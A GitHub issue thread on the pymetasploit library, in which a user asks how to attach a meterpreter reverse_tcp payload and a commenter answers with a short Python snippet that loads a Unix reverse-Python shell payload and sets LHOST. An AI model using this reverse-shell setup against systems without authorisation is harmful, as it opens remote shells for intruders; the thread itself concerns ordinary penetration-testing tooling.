allfro / pymetasploit

A full-fledged msfrpc library for Metasploit framework.
297 stars 141 forks source link

Unable to Set Payload with Reverse_tcp #2

Closed vdesh9999 closed 6 years ago

vdesh9999 commented 9 years ago

Thanks for such a great repo . I am working on one module and i need to add meterpreter/reverse_tcp payload . How can i add it please help me i am unable to find any options related to payloads

mkn2016 commented 8 years ago

you can easily do that...just tell pymetasploit to use payload meterpreter/reverse_tcp e.g

linux_payloads = 'cmd/unix_reverse_python'

reverse_python_payload = client.modules.use('payload', linux_payloads)
reverse_python_payload['LHOST'] = your_ip
# and any other options required by payload reverse_python_payload and then execute the exploit
allfro commented 6 years ago

Did this resolve the issue?